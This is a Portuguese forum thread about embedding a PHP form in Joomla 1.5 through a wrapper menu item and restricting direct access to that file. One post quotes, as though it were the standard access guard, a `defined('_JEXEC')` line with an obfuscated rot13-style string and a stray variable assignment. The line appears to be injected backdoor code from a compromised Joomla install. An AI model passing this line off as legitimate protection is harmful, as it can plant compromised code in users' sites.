• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!

Pedro Vieira

Joomla - Embrulho web (Wrapper)

9 mensagens neste tópico

Bom dia pode até ser simples a duvida que eu tenho mas como não estou a ver maneira de por isto direito queria saber se alguém sabe como usar um embrulho web no joomla mas sem ser "externo" ao joomla por exemplo quero criar um ficheiro php com um formulário onde as pessoas possam dar sugestões e que depois envie um mail para o director de recursos humanos e que registe na base de dados. até aí muito bem, mas a unica forma que eu tenho de fazer isso é colocar o ficheiro no localhost ou então na internet ou na rede, se o meter na pasta do joomla, quando tirar o joomla do meu computador para alojar no servidor ele não vai encontrar o ficheiro. Fiz me entender?  :dontgetit:

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Eu já fiz exactamente isso. Partindo do principio que estás a falar do joomla 1.5 que é o único que conheço...

crias um menu item do tipo 'wrapper' e depois podes lá definir o url.

Não percebi bem essas trocas baldrocas de estar no localhost e depois na intranet e depois já não estar... não sei... no wrapper tem lá um campo para inserires o url, é tudo o que tens que inserir, o url. Eu quando fiz isso pus os meus ficheiros php algures na pasta do joomla.

Claro que se estiveres a testar o joomla no teu pclocal qdo mudares para o dominio de produção terás que actualizar o url. Agora para ser franco não me lembro se é possível incluir um wildcard no url, tipo [basurl]/oteuficheiro.php

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

pois, era isso que eu queria, era poder ter um caminho fixo que possa mudar a pasta de computador sem ter que mudar url's ... porque eu usando o wrapper consigo que no meu caso é "embrulho web" pois está em português... mas obrigado na mesma...

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Mas permite-me a pergunta:

tens uma instalação do joomla que é par andar a mudar daqui prali frequentemente?

Tendo em conta que o joomla não tem suporte para bases de dados portáveis (nomeadamente sqlite) não estou a ver qual a autilidade disso.

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Mas permite-me a pergunta:

tens uma instalação do joomla que é par andar a mudar daqui prali frequentemente?

Tendo em conta que o joomla não tem suporte para bases de dados portáveis (nomeadamente sqlite) não estou a ver qual a autilidade disso.

É assim, eu estou a desenvolver o portal todo no meu computador, e quando acabado vou o transferir para o servidor, mas isto vai ter muitas áreas e não convinha que tivesse que mudar o Url em todas, e já agora o Wrapper nao está a funcionar pois eu estou a usar esta linha para restringir o acesso ao joomla.

defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );

e então no iframe ele corre como se não estivesse ligado ao joomla ou seja isso já não me interessa. Não me sabes dizer um método mais seguro?

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Não estou a perceber bem essa dúvida. O que está no iframe não precisa de ter qq ligação ao joomla.

Esse código aparece supostamente onde? no teu script que é embrulhado? Precisas de aceder a muitos dados do joomla nesse script?

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Eu não quero que ninguém aceda aquele ficheiro sem ser pelo joomla... e então tenho que usar a linha de código que mostrei em cima, mas ao chamar a pagina pelo wrapper ela não está ligada ao joomla do tipo include, está como iframe ou seja só é exibida não é incorporado o código... e resulta a mensagem "Acesso restrito"

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Uma iframe é um pedido HTTP distinto feito pelo teu browser. Sendo um pedido distinto, a autentição não pode ser feita no servidor. Tem que ser feita no cliente. A única forma de autenticares um cliente é usando cookies. O php oferece uma forma mais facil de gestão de autenticação que são as sessões (que usam elas próprias cookies).

Mas se o joomla não for mau a esse extremo, terá uma isso já implementado de forma a que um php include seja suficiente para acederes à validação do utilizador. Mas já nem digo nada.

O ariops é gajo para saber qual é o código a incluir, se não pergunta nos foruns do joomla.

Eu já estive à procura desta informação mas desisti, documentação não é com os camaradas do joomla.

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Pois, mas já desisti da ideia do wrapper vi num site como criar componentes, o meu chefe pediu-me para criar um manual, vou tentar adaptar e colocar aqui no forum. quando acabado edito e deixo o link.

0

Partilhar esta mensagem

Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!

Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.

Entrar Agora